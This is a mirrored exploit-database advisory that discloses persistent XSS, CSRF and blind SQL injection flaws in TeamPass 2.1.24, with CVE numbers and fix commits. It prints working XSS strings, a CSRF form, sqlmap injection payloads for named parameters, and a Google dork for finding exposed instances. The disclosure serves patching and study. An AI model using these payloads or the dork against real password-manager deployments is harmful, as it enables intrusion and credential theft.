TeamPass 2.1.24 – Multiple Vulnerabilities

• Exploit Database
• 93 阅读

• 作者： Vincent Malguy
  日期： 2016-03-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39559/

• Affected Product:TeamPass
  Vulnerability Type:	Multiple XSS,CSRF, SQL injections
  Fixed in Version:	2.1.25 (https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.25.0)
  Vendor Website:	http://www.teampass.net
  Software Link: : 	https://github.com/nilsteampassnet/TeamPass
  Affected Version:	2.1.24 and prior 
  Vulnerable software (including source) : https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.24.4
  Google Dork: intitle:"Teampass" + inurl:index.php?page=items
  Tested on: Ubuntu
  Remote Exploitable:Yes
  Reported to vendor:30 december 2015
  Disclosed to public: 14 March 2016
  Release mode:Responsible Disclosure
  CVE-2015-7562 TeamPass 2.1.24 Persistant XSS 
  CVE-2015-7563 TeamPass 2.1.24 CSRF 
  CVE-2015-7564 TeamPass 2.1.24 SQL Injection 
  Credits:Vincent Malguy
  
  
  Description :
  TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any server Apache, MySQL and PHP. It is especially designed to provide passwords access security for allowed people. This makes TeamPass really useful in a Business/Enterprise environment and will provide to IT or Team Manager a powerful and easy tool for customizing passwords access depending on the user’s role. 
  Copyright (c) 2009-2015, Nils Laumaillé
  
  ********************* CVE-2015-7562 TeamPass 2.1.24 Persistant XSS*********************
  When displaying the detail of an item (a password entry), the "label" value is display using the stripslashes() sanitization function. This function does not efficientlyprevent XSS.
  POC of a persistant XSS : additem with label : $str = "' onclick='javascript:alert("XSS found");' alt='";echo "<a href='https://www.exploit-db.com/exploits/39559/". strip_tags($str) ."'></a>";
  This xss will be trigger each time a user click on this item. 
  As item can be share, there is a way for a user to trick an admin to trigger this xss.
  fix in commit cd112ea (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
  
  POC of a persistant XSS : 
  Add a new role with name: <script>alert("XSS");</script> 
  This xss will be trigger in many admin pages
  Fix in commit : 3f0a6c9 & e29cd54 & 295cada & 2c8a829 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
  
  ********************* CVE-2015-7563 TeamPass 2.1.24 CSRF*********************
  Lack of anti-CSRF token lead to security vulnerabilities where an attacker can trick a authenticated user to do some unwanted action on his behalf :
  
  <form action="http://<teampass host>/sources/main.queries.php" method="post">
  <select name="type">
  <option value="increase_session_time »>will add 1 hour timeout to the user session</option>
  </select>
  <input type=submit>
  </form> 
  
  recommanded fix: add anti-CSRF token.
  
  ********************* CVE-2015-7564 TeamPass 2.1.24 SQL Injections *********************
  SQL injection has been found in item.query.php parameter id with type set to action_on_quick_icon.
  Sqlmap output:
  ---
  Parameter: id (POST)
  Type: boolean-based blind
  Title: MySQL >= 5.0 boolean-based blind - Parameter replace
  Payload: type=action_on_quick_icon&id=(SELECT (CASE WHEN (6144=6144) THEN 6144 ELSE 6144*(SELECT 6144 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action=1
   —
   fix in commit 795256f (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
  
  
  SQL injections has been found in view.query.php in parameters order and direction with type set to connections_logs, errors_logs or access_logs .
  Note that direction need to be prefixed by ", "in order to be exploitable
  Sqlmap outputfor connections_logs:
  ---
  Parameter: order (POST)
  Type: boolean-based blind
  Title: MySQL >= 5.0 boolean-based blind - Parameter replace
  Payload: type=connections_logs&order=(SELECT (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC
  
  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  Payload: type=connections_logs&order=date AND (SELECT * FROM (SELECT(SLEEP(5)))vhPw)&direction=DESC
  —
  
  ---
  Parameter: direction (POST)
   Type: boolean-based blind
   Title: MySQL >= 5.0 boolean-based blind - Parameter replace
   Payload: type=errors_logs&order=date&direction=,(SELECT (CASE WHEN (1739=1739) THEN 1739 ELSE 1739*(SELECT 1739 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
  —
  fix commit 86719e0 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
  

  Python

  Copy